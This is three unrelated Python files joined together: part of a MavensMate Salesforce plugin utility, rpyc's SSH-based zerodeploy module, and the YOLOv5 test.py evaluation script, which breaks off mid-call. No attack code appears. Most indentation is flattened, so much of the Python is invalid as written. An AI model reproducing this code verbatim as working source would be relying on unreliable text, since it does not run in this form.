project_name=project_name,
directory=params['directory'],
client=config.connection.plugin_client).encode('UTF-8')
elif operation == 'debug_log':
template = env.get_template('/debug_log/index.html')
file_body = template.render(
base_path=config.base_path,
project_name=config.connection.project.project_name,
users=config.connection.project.get_org_users_list(),
logs=config.connection.project.get_org_logs(),
client=config.connection.plugin_client).encode('UTF-8')
temp.write(file_body)
temp.close()
return temp.name
def generate_html_response(operation, obj, params):
template_path = config.base_path + "/lib/ui/templates"
env = Environment(loader=FileSystemLoader(template_path),trim_blocks=True,extensions=['jinja2.ext.loopcontrols', jinja2htmlcompress.HTMLCompress])
env.globals['get_file_lines'] = get_file_lines
env.globals['htmlize'] = htmlize
env.globals['does_file_exist'] = does_file_exist
if operation == 'unit_test' or operation == 'test':
template = env.get_template('/unit_test/result.html')
config.logger.debug(json.dumps(obj, sort_keys=True,indent=4))
result = process_unit_test_result(obj)
config.logger.debug('\n\n\n\n\n')
config.logger.debug(json.dumps(result, sort_keys=True,indent=4))
html = template.render(result=result,results_normal={},args=params)
elif operation == 'deploy':
template = env.get_template('/deploy/result.html')
deploy_results = []
for result in obj:
if 'messages' in result:
for m in result['messages']:
if m['success'] == False:
result['success'] = False
break
if 'runTestResult' in result and 'codeCoverage' in result['runTestResult']:
result['parsedTestResults'] = process_unit_test_result(result['runTestResult'])
deploy_results.append(result)
else:
deploy_results.append(result)
config.logger.debug(obj)
config.logger.debug(deploy_results)
html = template.render(deploy_results=deploy_results,args=params)
elif operation == 'index_metadata':
template = env.get_template('/project/tree.html')
org_metadata = config.connection.project.get_org_metadata()
html = template.render(metadata=org_metadata)
return html
def play_sounds():
return config.connection.get_plugin_client_setting('mm_play_sounds', False)
def does_file_exist(api_name, metadata_type_name):
metadata_type = get_meta_type_by_name(metadata_type_name)
if os.path.isfile(config.connection.project.location+"/src/"+metadata_type['directoryName']+"/"+api_name+"."+metadata_type['suffix']):
return True
else:
return False
def get_file_lines(api_name, metadata_type_name):
try:
metadata_type = get_meta_type_by_name(metadata_type_name)
if os.path.isfile(config.connection.project.location+"/src/"+metadata_type['directoryName']+"/"+api_name+"."+metadata_type['suffix']):
return open(config.connection.project.location+"/src/"+metadata_type['directoryName']+"/"+api_name+"."+metadata_type['suffix']).readlines()
else:
return []
except:
return []
def htmlize(seed):
try:
seed = seed.decode('utf8')
        seed = re.sub("&", "&amp;", seed)
        seed = re.sub('"', "&quot;", seed)
        seed = re.sub("<", "&lt;", seed)
        seed = re.sub(">", "&gt;", seed)
        seed = re.sub("\t", "&nbsp;&nbsp;&nbsp;&nbsp;", seed)
        seed = re.sub(" ", "&nbsp;", seed)
        seed = re.sub("\n", "<br/>", seed)
return seed
except:
return 'Not Available'
def launch_ui(tmp_html_file_location):
os.system("open -n '"+config.base_path+"/bin/MavensMateWindowServer.app' --args -url '"+tmp_html_file_location+"'")
threading.Thread(target=remove_tmp_html_file, args=(tmp_html_file_location,)).start()
def remove_tmp_html_file(tmp_html_file_location):
time.sleep(1)
os.remove(tmp_html_file_location)
def generate_response(obj):
return json.dumps(obj)
def generate_success_response(message, type="text"):
res = {
"time" : repr(time.clock() - config.mm_start),
"success" : True,
"body_type" : type,
"body" : message
}
return json.dumps(res)
def generate_error_response(message):
# hide path info from build
try:
trace = re.sub( r'\"/(.*?\.pyz/)', r'', traceback.format_exc()).strip()
message = message.strip()
if trace != None and trace != 'None' and 'raise MMException' not in trace:
# if message = e.message just use the trace
if len(trace):
if trace.endswith(message):
message = ''
message += '\n' + '[STACKTRACE]: ' + trace
message += '\n'+'[ENVIRONMENT]: '
# get OS info
try:
if sys.platform == 'darwin':
release, versioninfo, machine = platform.mac_ver()
message += 'MacOS ' + release
#todo: support windows and linux
except:
pass
# try to get the executable version
try:
dic = plistlib.readPlist('/Applications/MavensMate.app/Contents/Info.plist')
if 'CFBundleVersion' in dic:
message += ', MavensMate ' + dic['CFBundleVersion']
except:
pass
config.logger.exception("[MAVENSMATE CAUGHT ERROR]")
res = {
"success" : False,
"body_type" : "text",
"body" : message
}
return json.dumps(res)
except:
res = {
"success" : False,
"body_type" : "text",
"body" : message
}
return json.dumps(res)
def get_request_payload():
try:
if sys.stdin.isatty():
return {}
return json.loads(sys.stdin.read())
except ValueError, e:
#sys.exit(1)
return {}
def lower_keys(x):
if isinstance(x, list):
return [lower_keys(v) for v in x]
if isinstance(x, dict):
return dict((k.lower(), lower_keys(v)) for k, v in x.iteritems())
return x
#prepares the unit test result for processing by the jinja template
def process_unit_test_result(result):
config.logger.debug('>>>> RUN TEST RESULT')
config.logger.debug(result)
triggers = []
classes = []
if 'codeCoverage' in result:
# for single results we don't get a list back
if type(result['codeCoverage']) is not list:
result['codeCoverage'] = [result['codeCoverage']]
for coverage_result in result['codeCoverage']:
if 'locationsNotCovered' in coverage_result and type(coverage_result['locationsNotCovered']) is not list:
coverage_result['locationsNotCovered'] = [coverage_result['locationsNotCovered']]
if 'numLocations' in coverage_result and 'numLocationsNotCovered' in coverage_result:
locations = int(float(coverage_result['numLocations']))
locations_not_covered = int(float(coverage_result['numLocationsNotCovered']))
percent_covered = 0
if locations > 0:
percent_covered = int(round(100 * ((float(locations) - float(locations_not_covered)) / locations)))
coverage_result['percentCovered'] = percent_covered
if percent_covered < 40:
coverage_result['coverageLevel'] = 'danger'
elif percent_covered >= 40 and percent_covered < 75:
coverage_result['coverageLevel'] = 'warning'
elif percent_covered >= 75:
coverage_result['coverageLevel'] = 'success'
else:
coverage_result['coverageLevel'] = 'info'
if 'type' in coverage_result:
if coverage_result['type'] == 'Trigger':
triggers.append(coverage_result)
else:
classes.append(coverage_result)
elif 'id' in coverage_result:
result_id = coverage_result['id']
if result_id.startswith('01q'):
triggers.append(coverage_result)
else:
classes.append(coverage_result)
if 'codeCoverageWarnings' in result:
# for single results we don't get a list back
if type(result['codeCoverageWarnings']) is not list:
result['codeCoverageWarnings'] = [result['codeCoverageWarnings']]
for warning in result['codeCoverageWarnings']:
if 'name' in warning and type(warning['name']) is not str and type(warning['name']) is not unicode:
warning['name'] = None
results_normal = {}
    # e.g. {"foo": [{"name": "foobar"}, {"name": "something else"}], "bar": []}
pass_fail = {}
if 'successes' in result:
# for single results we don't get a list back
if type(result['successes']) is not list:
result['successes'] = [result['successes']]
for success in result['successes']:
if success['name'] not in pass_fail:
pass_fail[success['name']] = {
'fail': 0,
'pass': 1
}
else:
pass_fail[success['name']]['pass'] += 1
if success['name'] not in results_normal: #key isn't there yet, put it in
results_normal[success['name']] = [success]
else: #key is there, let's add metadata to it
arr = results_normal[success['name']] #get the existing array
arr.append(success) #add the new piece of metadata
results_normal[success['name']] = arr #replace the key
if 'failures' in result:
# for single results we don't get a list back
if type(result['failures']) is not list:
result['failures'] = [result['failures']]
for failure in result['failures']:
if failure['name'] not in pass_fail:
pass_fail[failure['name']] = {
'fail': 1,
'pass': 0
}
else:
pass_fail[failure['name']]['fail'] += 1
if failure['name'] not in results_normal: #key isn't there yet, put it in
results_normal[failure['name']] = [failure]
else: #key is there, let's add metadata to it
arr = results_normal[failure['name']] #get the existing array
arr.append(failure) #add the new piece of metadata
results_normal[failure['name']] = arr #replace the key
result['pass_fail'] = pass_fail
result['results_normal'] = results_normal
result['codeCoverage'] = {
"triggers" : triggers,
"classes" : classes
}
return result
def get_file_extension_no_period(path):
name, ext = os.path.splitext(path)
return ext.replace(".", "")
def get_file_name_no_extension(path):
name, ext = os.path.splitext(path)
return name.split("/")[-1]
#returns metadata hash of selected files #=> {"ApexClass" => ["aclass", "anotherclass"], "ApexTrigger" => ["atrigger", "anothertrigger"]}
def get_metadata_hash(selected_files=[]):
meta_hash = {}
for f in selected_files:
if '-meta.xml' in f:
continue
name, ext = os.path.splitext(f)
base_name_no_ext = os.path.basename(f).split(".")[0]
ext_no_period = ext.replace(".", "")
metadata_definition = get_meta_type_by_suffix(ext_no_period)
meta_type = metadata_definition["xmlName"]
if meta_type not in meta_hash: #key isn't there yet, put it in
if metadata_definition['inFolder']:
arr = f.split("/")
if arr[len(arr)-2] != metadata_definition['directoryName']:
meta_hash[meta_type] = [arr[len(arr)-2]+"/"+base_name_no_ext] #file name with no extension
else:
meta_hash[meta_type] = [base_name_no_ext]
else:
meta_hash[meta_type] = [base_name_no_ext]
else: #key is there, let's add metadata to it
meta_array = meta_hash[meta_type] #get the existing array
if metadata_definition['inFolder']:
arr = f.split("/")
if arr[len(arr)-2] != metadata_definition['directoryName']:
meta_array.append(arr[len(arr)-2]+"/"+base_name_no_ext) #file name with no extension
else:
meta_array.append(base_name_no_ext) #add the new piece of metadata
else:
meta_array.append(base_name_no_ext) #file name with no extension
meta_hash[meta_type] = meta_array #replace the key
return meta_hash
def parse_deploy_result(res):
return_result = {
"id" : res["id"],
"success" : res["success"]
}
    return_result["messages"] = parse_deploy_messages(res)
    if 'runTestResult' in res:
        if type(res['runTestResult']) is not list:
            return_result['runTestResult'] = [res['runTestResult']]
        else:
            return_result['runTestResult'] = res['runTestResult']
    return return_result
def parse_deploy_messages(res):
messages = []
return_messages = []
    if 'messages' in res and type(res['messages']) is not list:
        messages = [res['messages']]
    else:
        messages = res.get('messages', [])
for m in messages:
return_messages.append({
"changed" : m["changed"],
"columnNumber" : m["columnNumber"],
"created" : m["created"],
"deleted" : m["deleted"],
"fileName" : m["fileName"],
"fullName" : m["fullName"],
"id" : m["id"],
"lineNumber" : m["lineNumber"],
"problem" : m["problem"],
"problemType" : m["problemType"],
"success" : m["success"]
})
return return_messages
def parse_run_test_result(res):
    return_result = {}
    run_test_result = res.get('runTestResult', {})
    def as_list(key):
        # single results come back as a bare dict rather than a list
        value = run_test_result.get(key, [])
        return value if type(value) is list else [value]
    code_coverage = as_list('codeCoverage')
    code_coverage_warnings = as_list('codeCoverageWarnings')
    failures = as_list('failures')
    successes = as_list('successes')
    code_coverage_return = []
    for c in code_coverage:
        code_coverage_return.append({
            "id" : c.get("id"),
            "name" : c.get("name"),
            "type" : c.get("type"),
            "numLocations" : c.get("numLocations"),
            "numLocationsNotCovered" : c.get("numLocationsNotCovered"),
            "locationsNotCovered" : c.get("locationsNotCovered")
        })
    return_result['codeCoverage'] = code_coverage_return
    return_result['codeCoverageWarnings'] = code_coverage_warnings
    return_result['failures'] = failures
    return_result['successes'] = successes
    return return_result
def grouper(n, iterable, fillvalue=None):
"grouper(3, 'ABCDEFG', 'x') --> ABC DEF Gxx"
args = [iter(iterable)] * n
return itertools.izip_longest(fillvalue=fillvalue, *args)
# def get_creds(project_directory):
# f = open(project_directory + "/config/settings.yaml")
# settings = yaml.safe_load(f)
# f.close()
# project_name = settings['project_name']
# username = settings['username']
# environment = settings['environment']
# password = get_password_by_project_name(project_name)
# endpoint = get_sfdc_endpoint_by_type(environment)
# return { "username" : username, "password" : password, "endpoint" : endpoint }
#returns array of selected files #=> ["/users/username/projects/foo/classes/myclass123.cls", /users/username/projects/foo/classes/myclass345.cls"]
# def get_selected_files(active_file=False):
# if active_file:
# return Array[ENV['TM_FILEPATH']]
# else:
# try:
# selected_files = ENV["TM_SELECTED_FILES"].split(",")
# #selected_files = Shellwords.shellwords(ENV["TM_SELECTED_FILES"])
# for f in selected_files:
# if '-meta.xml' in f:
# continue
# ext = File.extname(f).gsub(".","") #=> cls
# mt_hash = get_meta_type_by_suffix(ext)
# if mt_hash == None:
# selected_files.delete(f) #????
# continue
# if mt_hash[:meta_file]:
# if f + "-meta.xml" not in selected_files: #if they didn't select the meta file, select it anyway
# selected_files.append(f + "-meta.xml")
# selected_files.uniq!
# return selected_files
# except BaseException, e:
# return Array[ENV['TM_FILEPATH']]
|
zerodeploy.py
|
"""
.. versionadded:: 3.3
Requires [plumbum](http://plumbum.readthedocs.org/)
"""
from __future__ import with_statement
import rpyc
import socket
from rpyc.core.service import VoidService
from rpyc.core.stream import SocketStream
try:
from plumbum import local, ProcessExecutionError
from plumbum.path import copy
except ImportError:
import inspect
if any("sphinx" in line[1] or "docutils" in line[1] or "autodoc" in line[1] for line in inspect.stack()):
# let the sphinx docs be built without requiring plumbum installed
pass
else:
raise
SERVER_SCRIPT = r"""\
import sys
import os
import atexit
import shutil
from threading import Thread
here = os.path.dirname(__file__)
os.chdir(here)
def rmdir():
shutil.rmtree(here, ignore_errors = True)
atexit.register(rmdir)
try:
for dirpath, _, filenames in os.walk(here):
for fn in filenames:
if fn == "__pycache__" or (fn.endswith(".pyc") and os.path.exists(fn[:-1])):
os.remove(os.path.join(dirpath, fn))
except Exception:
pass
sys.path.insert(0, here)
from $MODULE$ import $SERVER$ as ServerCls
from rpyc import SlaveService
logger = None
$EXTRA_SETUP$
t = ServerCls(SlaveService, hostname = "localhost", port = 0, reuse_addr = True, logger = logger)
sys.stdout.write("%s\n" % (t.port,))
sys.stdout.flush()
try:
thd = Thread(target = t.start)
thd.setDaemon(True)
thd.start()
sys.stdin.read()
finally:
t.close()
thd.join(2)
"""
class DeployedServer(object):
"""
Sets up a temporary, short-lived RPyC deployment on the given remote machine. It will:
1. Create a temporary directory on the remote machine and copy RPyC's code
from the local machine to the remote temporary directory.
2. Start an RPyC server on the remote machine, binding to an arbitrary TCP port,
allowing only in-bound connections (``localhost`` connections). The server reports the
chosen port over ``stdout``.
3. An SSH tunnel is created from an arbitrary local port (on the local host), to the remote
machine's chosen port. This tunnel is authenticated and encrypted.
4. You get a ``DeployedServer`` object that can be used to connect to the newly-spawned server.
5. When the deployment is closed, the SSH tunnel is torn down, the remote server terminates
and the temporary directory is deleted.
:param remote_machine: a plumbum ``SshMachine`` or ``ParamikoMachine`` instance, representing
an SSH connection to the desired remote machine
:param server_class: the server to create (e.g., ``"ThreadedServer"``, ``"ForkingServer"``)
:param extra_setup: any extra code to add to the script
"""
def __init__(self, remote_machine, server_class = "rpyc.utils.server.ThreadedServer", extra_setup = ""):
self.proc = None
self.tun = None
self.remote_machine = remote_machine
self._tmpdir_ctx = None
rpyc_root = local.path(rpyc.__file__).up(2)
self._tmpdir_ctx = remote_machine.tempdir()
tmp = self._tmpdir_ctx.__enter__()
copy(rpyc_root, tmp)
script = (tmp / "deployed-rpyc.py")
modname, clsname = server_class.rsplit(".", 1)
script.write(SERVER_SCRIPT.replace("$MODULE$", modname).replace("$SERVER$", clsname).replace("$EXTRA_SETUP$", extra_setup))
self.proc = remote_machine.python.popen(script, new_session = True)
line = ""
try:
line = self.proc.stdout.readline()
self.remote_port = int(line.strip())
except Exception:
try:
self.proc.terminate()
except Exception:
pass
stdout, stderr = self.proc.communicate()
raise ProcessExecutionError(self.proc.argv, self.proc.returncode, line + stdout, stderr)
if hasattr(remote_machine, "connect_sock"):
# Paramiko: use connect_sock() instead of tunnels
self.local_port = None
else:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("localhost", 0))
self.local_port = s.getsockname()[1]
s.close()
self.tun = remote_machine.tunnel(self.local_port, self.remote_port)
def __del__(self):
self.close()
def __enter__(self):
return self
def __exit__(self, t, v, tb):
self.close()
def close(self):
if self.proc is not None:
try:
self.proc.terminate()
except Exception:
pass
self.proc = None
if self.tun is not None:
try:
self.tun.close()
except Exception:
pass
self.tun = None
if self._tmpdir_ctx is not None:
try:
self._tmpdir_ctx.__exit__(None, None, None)
except Exception:
pass
self._tmpdir_ctx = None
def connect(self, service = VoidService, config = {}):
"""Same as :func:`connect <rpyc.utils.factory.connect>`, but with the ``host`` and ``port``
parameters fixed"""
if self.local_port is None:
# ParamikoMachine
stream = SocketStream(self.remote_machine.connect_sock(self.remote_port))
return rpyc.connect_stream(stream, service = service, config = config)
else:
return rpyc.connect("localhost", self.local_port, service = service, config = config)
def classic_connect(self):
"""Same as :func:`classic.connect <rpyc.utils.classic.connect>`, but with the ``host`` and
``port`` parameters fixed"""
if self.local_port is None:
# ParamikoMachine
stream = SocketStream(self.remote_machine.connect_sock(self.remote_port))
return rpyc.classic.connect_stream(stream)
else:
return rpyc.classic.connect("localhost", self.local_port)
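# Illustrative usage sketch (not part of this module): a single-machine deployment as
# described in the DeployedServer docstring above. The host name and user are placeholders.
def _example_single_deployment():
    from plumbum import SshMachine
    mach = SshMachine("example-host", user="someuser")
    with DeployedServer(mach) as dep:       # copies rpyc over, starts the server, opens the tunnel
        conn = dep.classic_connect()        # rpyc "classic" connection through the tunnel
        print(conn.modules.sys.platform)    # evaluated on the remote machine
    # leaving the with-block closes the tunnel, terminates the server and deletes the temp dir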
class MultiServerDeployment(object):
"""
    An 'aggregate' server deployment to multiple SSH machines. It deploys RPyC to each machine
separately, but lets you manage them as a single deployment.
"""
def __init__(self, remote_machines, server_class = "ThreadedServer"):
self.remote_machines = remote_machines
# build the list incrementally, so we can clean it up if we have an exception
self.servers = [DeployedServer(mach, server_class) for mach in remote_machines]
def __del__(self):
self.close()
def __enter__(self):
return self
def __exit__(self, t, v, tb):
self.close()
def __iter__(self):
return iter(self.servers)
def __len__(self):
return len(self.servers)
def __getitem__(self, index):
return self.servers[index]
def close(self):
while self.servers:
s = self.servers.pop(0)
s.close()
def connect_all(self, service = VoidService, config = {}):
"""connects to all deployed servers; returns a list of connections (order guaranteed)"""
return [s.connect(service, config) for s in self.servers]
def classic_connect_all(self):
"""connects to all deployed servers using classic_connect; returns a list of connections (order guaranteed)"""
return [s.classic_connect() for s in self.servers]
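# Illustrative usage sketch (not part of this module): fanning out to several machines at
# once. `remote_machines` is assumed to be a list of plumbum SshMachine/ParamikoMachine objects.
def _example_multi_deployment(remote_machines):
    with MultiServerDeployment(remote_machines) as dep:
        for conn in dep.connect_all():      # one rpyc connection per deployed server
            print(conn.root)                # the root service exposed by that remote server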
|
test.py
|
import argparse
import json
import os
from pathlib import Path
from threading import Thread
import numpy as np
import torch
import yaml
from tqdm import tqdm
from models.experimental import attempt_load
from utils.datasets import create_dataloader
from utils.general import coco80_to_coco91_class, check_dataset, check_file, check_img_size, check_requirements, \
box_iou, non_max_suppression, scale_coords, xyxy2xywh, xywh2xyxy, set_logging, increment_path, colorstr
from utils.loss import compute_loss
from utils.metrics import ap_per_class, ConfusionMatrix
from utils.plots import plot_images, output_to_target, plot_study_txt
from utils.torch_utils import select_device, time_synchronized
def test(data,
weights=None,
batch_size=32,
imgsz=640,
conf_thres=0.001,
iou_thres=0.6, # for NMS
save_json=False,
single_cls=False,
augment=False,
verbose=False,
model=None,
dataloader=None,
save_dir=Path(''), # for saving images
save_txt=False, # for auto-labelling
save_hybrid=False, # for hybrid auto-labelling
save_conf=False, # save auto-label confidences
plots=True,
log_imgs=0): # number of logged images
# Initialize/load model and set device
training = model is not None
if training: # called by train.py
device = next(model.parameters()).device # get model device
else: # called directly
set_logging()
device = select_device(opt.device, batch_size=batch_size)
# Directories
save_dir = Path(increment_path(Path(opt.project) / opt.name, exist_ok=opt.exist_ok)) # increment run
(save_dir / 'labels' if save_txt else save_dir).mkdir(parents=True, exist_ok=True) # make dir
# Load model
model = attempt_load(weights, map_location=device) # load FP32 model
imgsz = check_img_size(imgsz, s=model.stride.max()) # check img_size
# Multi-GPU disabled, incompatible with .half() https://github.com/ultralytics/yolov5/issues/99
# if device.type != 'cpu' and torch.cuda.device_count() > 1:
# model = nn.DataParallel(model)
# Half
half = device.type != 'cpu' # half precision only supported on CUDA
if half:
model.half()
# Configure
model.eval()
is_coco = data.endswith('coco.yaml') # is COCO dataset
with open(data) as f:
data = yaml.load(f, Loader=yaml.FullLoader) # model dict
check_dataset(data) # check
nc = 1 if single_cls else int(data['nc']) # number of classes
iouv = torch.linspace(0.5, 0.95, 10).to(device) # iou vector for mAP@0.5:0.95
niou = iouv.numel()
# Logging
log_imgs, wandb = min(log_imgs, 100), None # ceil
try:
import wandb # Weights & Biases
except ImportError:
log_imgs = 0
# Dataloader
if not training:
img = torch.zeros((1, 3, imgsz, imgsz), device=device) # init img
_ = model(img.half() if half else img) if device.type != 'cpu' else None # run once
path = data['test'] if opt.task == 'test' else data['val'] # path to val/test images
dataloader = create_dataloader(path, imgsz, batch_size, model.stride.max(), opt, pad=0.5, rect=True,
prefix=colorstr('test: ' if opt.task == 'test' else 'val: '))[0]
seen = 0
confusion_matrix = ConfusionMatrix(nc=nc)
names = {k: v for k, v in enumerate(model.names if hasattr(model, 'names') else model.module.names)}
coco91class = coco80_to_coco91_class()
s = ('%20s' + '%12s' * 6) % ('Class', 'Images', 'Targets', 'P', 'R', 'mAP@.5', 'mAP@.5:.95')
p, r, f1, mp, mr, map50, map, t0, t1 = 0., 0., 0., 0., 0., 0., 0., 0., 0.
loss = torch.zeros(3, device=device)
jdict, stats, ap, ap_class, wandb_images = [], [], [], [], []
for batch_i, (img, targets, paths, shapes) in enumerate(tqdm(dataloader, desc=s)):
img = img.to(device, non_blocking=True)
img = img.half() if half else img.float() # uint8 to fp16/32
img /= 255.0 # 0 - 255 to 0.0 - 1.0
targets = targets.to(device)
nb, _, height, width = img.shape # batch size, channels, height, width
with torch.no_grad():
# Run model
t = time_synchronized()
inf_out, train_out = model(img, augment=augment) # inference and training outputs
t0 += time_synchronized() - t
# Compute loss
if training:
loss += compute_loss([x.float() for x in train_out], targets, model)[1][:3] # box, obj, cls
# Run NMS
targets[:, 2:] *= torch.Tensor([width, height, width, height]).to(device) # to pixels
lb = [targets[targets[:, 0] == i, 1:] for i in range(nb)] if save_hybrid else [] # for autolabelling
t = time_synchronized()
output = non_max_suppression(inf_out, conf_thres=conf_thres, iou_thres=iou_thres, labels=lb)
t1 += time_synchronized() - t
# Statistics per image
for si, pred in enumerate(output):
labels = targets[targets[:, 0] == si, 1:]
nl = len(labels)
tcls = labels[:, 0].tolist() if nl else [] # target class
path = Path(paths[si])
seen += 1
if len(pred) == 0:
if nl:
stats.append((torch.zeros(0, niou, dtype=torch.bool), torch.Tensor(), torch.Tensor(), tcls))
continue
# Predictions
predn = pred.clone()
scale_coords(img[si].shape[1:], predn[:, :4], shapes[si][0], shapes[si][1]) # native-space pred
# Append to text file
if save_txt:
gn = torch.tensor(shapes[si][0])[[1, 0, 1, 0]] # normalization gain whwh
for *xyxy, conf, cls in predn.tolist():
xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist() # normalized xywh
line = (cls, *xywh, conf) if save_conf else (cls, *xywh) # label format
with open(save_dir / 'labels' / (path.stem + '.txt'), 'a') as f:
f.write(('%g ' * len(line)).rstrip() % line + '\n')
# W&B logging
if plots and len(wandb_images) < log_imgs:
box_data = [{"position": {"minX": xyxy[0], "minY": xyxy[1], "maxX": xyxy[2], "maxY": xyxy[3]},
"class_id": int(cls),
"box_caption": "%s %.3f" % (names[cls], conf),
"scores": {"class_score": conf},
"domain": "pixel"} for *xyxy, conf, cls in pred.tolist()]
boxes = {"predictions": {"box_data": box_data, "class_labels": names}} # inference-space
wandb_images.append(wandb.Image(img[si], boxes=boxes, caption=path.name))
# Append to pycocotools JSON dictionary
if save_json:
# [{"image_id": 42, "category_id": 18, "bbox": [258.15, 41.29, 348.26, 243.78], "score": 0.236}, ...
image_id = int(path.stem) if path.stem.isnumeric() else path.stem
box = xyxy2xywh(predn[:, :4]) # xywh
box[:, :2] -= box[:, 2:] / 2 # xy center to top-left corner
for p, b in zip(pred.tolist(), box.tolist()):
jdict.append({'image_id': image_id,
'category_id': coco91class[int(p[5])] if is_coco else int(p[5]),
'bbox': [round(x, 3) for x in b],
'score': round(p[4], 5)})
# Assign all predictions as incorrect
correct = torch.zeros(pred.shape[0], niou, dtype=torch.bool, device=device)
if nl:
detected = [] # target indices
tcls_tensor = labels[:, 0]
# target boxes
tbox = xywh2xyxy(labels[:, 1:5])
scale_coords(img[si].shape[1:], tbox, shapes[si][0], shapes[si][1]) # native-space labels
if plots:
confusion_matrix.process_batch(pred, torch.cat((labels[:, 0:1], tbox), 1))
# Per target class
for cls in torch.unique(tcls_tensor):
ti = (cls == tcls_tensor).nonzero(as_tuple=False).view(-1) # prediction indices
pi = (cls == pred[:, 5]).nonzero(as_tuple=False).view(-1) # target indices
# Search for detections
if pi.shape[0]:
# Prediction to target ious
ious, i = box_iou(predn[pi, :4], tbox[ti]).max(1) # best ious, indices
# Append detections
detected_set = set()
for j in (ious > iouv[0]).nonzero(as_tuple=False):
d = ti[i[j]] # detected target
if d.item() not in detected_set:
detected_set.add(d.item())
detected.append(d)
correct[pi[j]] = ious[j] > iouv # iou_thres is 1xn
if len(detected) == nl: # all targets already located in image
break
# Append statistics (correct, conf, pcls, tcls)
stats.append((correct.cpu(), pred[:, 4].cpu(), pred[:, 5].cpu(), tcls))
# Plot images
if plots and batch_i < 3:
f = save_dir / f'test_batch{batch_i}_labels.jpg' # labels
Thread(target=plot_images, args=(img, targets, paths, f, names), daemon=True).start()
f = save_dir / f'test_batch{batch_i}_pred.jpg' # predictions
Thread(target=plot_images, args=(img, output_to_target(output), paths, f, names), daemon=True).start()
# Compute statistics
stats = [np.concatenate(x, 0) for x in zip(*stats)] # to numpy
if len(stats) and stats[0].any():
p, r, ap, f1, ap_class = ap_per_class(*stats, plot=plots, save_dir=save_dir, names=names)
p, r, ap50, ap = p[:, 0], r[:, 0], ap[:, 0], ap.mean(1) # [P, R, AP@0.5, AP@0.5:0.95]
mp, mr, map50, map = p.mean(), r.mean(), ap50.mean(), ap.mean()
nt = np.bincount(stats[3].astype(np.int64), minlength=nc) # number of targets per class
else:
nt = torch.zeros(1)
# Print results
pf = '%20s' + '%12.3g' * 6 # print format
print(pf % ('all', seen, nt.sum(), mp, mr, map50, map))
# Print results per class
if (verbose or (nc <= 20 and not training)) and nc > 1 and len(stats):
for i, c in enumerate(ap_class):
print(pf % (names[c], seen, nt[c], p[i], r[i], ap50[i], ap[i]))
# Print speeds
t = tuple(x / seen * 1E3 for x in (t0, t1, t0 + t1)) + (imgsz, imgsz, batch_size) # tuple
if not training:
print('Speed: %.1f/%.1f/%.1f ms inference/NMS/total per %gx%g image at batch-size %g' % t)
# Plots
if plots:
confusion_matrix.plot(save_dir=save_dir, names=list(names.values()))
if wandb and wandb.run:
wandb.log({"Images": wandb_images})
wandb.log({"Validation": [wandb.Image(str(f), caption=f.name) for f in sorted(save_dir.glob('test*.jpg'))]})
# Save JSON
if save_json and len(jdict):
w = Path(weights[0] if isinstance(weights, list) else weights).stem if weights is not None else '' # weights
anno_json = '../coco/annotations/instances_val2017.json' # annotations json
pred_json = str(save_dir / f"{w}_predictions.json") # predictions json
print('\nEvaluating pycocotools mAP... saving %s...' % pred_json)
with open(pred_json, 'w') as f:
json.dump(jdict, f)
try: # https://github.com/cocodataset/cocoapi/blob/master/PythonAPI/pycocoEvalDemo.ipynb
from pycocotools.coco import COCO
from pycocotools.cocoeval import COCOeval
anno = COCO(anno_json) # init annotations api
pred = anno.loadRes(pred_json) # init predictions api
eval = COCOeval(anno, pred, 'bbox')
if is_coco:
eval.params.imgIds = [int(Path(x).stem) for x in dataloader.dataset.img_files] # image IDs to evaluate
eval.evaluate()
eval.accumulate()
eval.summarize()
map, map50 = eval.stats[:2] # update results (mAP@0.5:0.95, mAP@0.5)
except Exception as e:
print(f'pycocotools unable to run: {e}')
# Return results
if not training:
s = f"\n{len(list(save_dir.glob('labels/*.txt')))} labels saved to {save_dir / 'labels'}" if save_txt else ''
print(f"Results saved to {save_dir}{s}")
model.float() # for training
maps = np.zeros(nc) + map
for i, c in enumerate(ap_class):
maps[c] = ap[i]
return (mp, mr, map50, map, *(loss.cpu() / len(dataloader)).tolist()), maps, t
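# Illustrative sketch (not part of the original script): how the loop above marks each
# prediction "correct" across the 10 IoU thresholds in `iouv`, using the same box_iou
# helper imported at the top of this file. The toy boxes are made up for this example.
def _toy_iou_matching_example():
    iouv = torch.linspace(0.5, 0.95, 10)   # same thresholds as in test()
    preds = torch.tensor([[0., 0., 10., 10.], [20., 20., 30., 30.]])  # two predicted boxes (xyxy)
    targets = torch.tensor([[1., 1., 10., 10.]])                      # one ground-truth box (xyxy)
    ious, _ = box_iou(preds, targets).max(1)   # best-matching target IoU for each prediction
    correct = ious[:, None] > iouv[None, :]    # (num_preds, 10) bool, one column per threshold
    return correct  # row 0 (IoU 0.81): True for thresholds up to 0.80; row 1 (no overlap): all False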
if __name__ == '__main__':
parser = argparse.ArgumentParser(prog='test.py')
parser.add_argument('--weights', nargs='+', type=str, default='yolov5s.pt', help='model.pt path(s)')
parser.add_argument('--data', type=str, default='data/coco128.yaml', help='*.data path')
parser.add_argument('--batch-size', type=int, default=32, help='size of each image batch')
parser.add_argument('--img-size', type=int, default=640, help='inference size (pixels)')
parser.add_argument('--conf-thres', type=float, default=0.001, help='object confidence threshold')
parser.add_argument('--iou-thres', type=float, default=0.6, help='IOU threshold for NMS')
parser.add_argument('--task', default='val', help="'val', 'test', 'study'")
parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
parser.add_argument('--single-cls', action='store_true', help='treat as single-class dataset')
parser.add_argument('--augment', action='store_true', help='augmented inference')
parser.add_argument('--verbose', action='store_true', help='report mAP by class')
parser.add_argument('--save-txt', action='store_true', help='save results to *.txt')
parser.add_argument('--save-hybrid', action='store_true', help='save label+prediction hybrid results to *.txt')
parser.add_argument('--save-conf', action='store_true', help='save confidences in --save-txt labels')
parser.add_argument('--save-json', action='store_true', help='save a cocoapi-compatible JSON results file')
parser.add_argument('--project', default='runs/test', help='save to project/name')
parser.add_argument('--name', default='exp', help='save to project/name')
parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
opt = parser.parse_args()
opt.save_json |= opt.data.endswith('coco.yaml')
opt.data = check_file(opt.data) # check file
print(opt)
check_requirements()
if opt.task in ['val', 'test']: # run normally
test(opt.data,
opt.weights,
opt.batch_size,
opt.img_size,
opt.conf_thres,
opt.iou_thres,
opt.save_json,
opt.single_cls,
opt.augment,
opt.verbose,
save_txt=opt.save_txt | opt.save_hybrid,
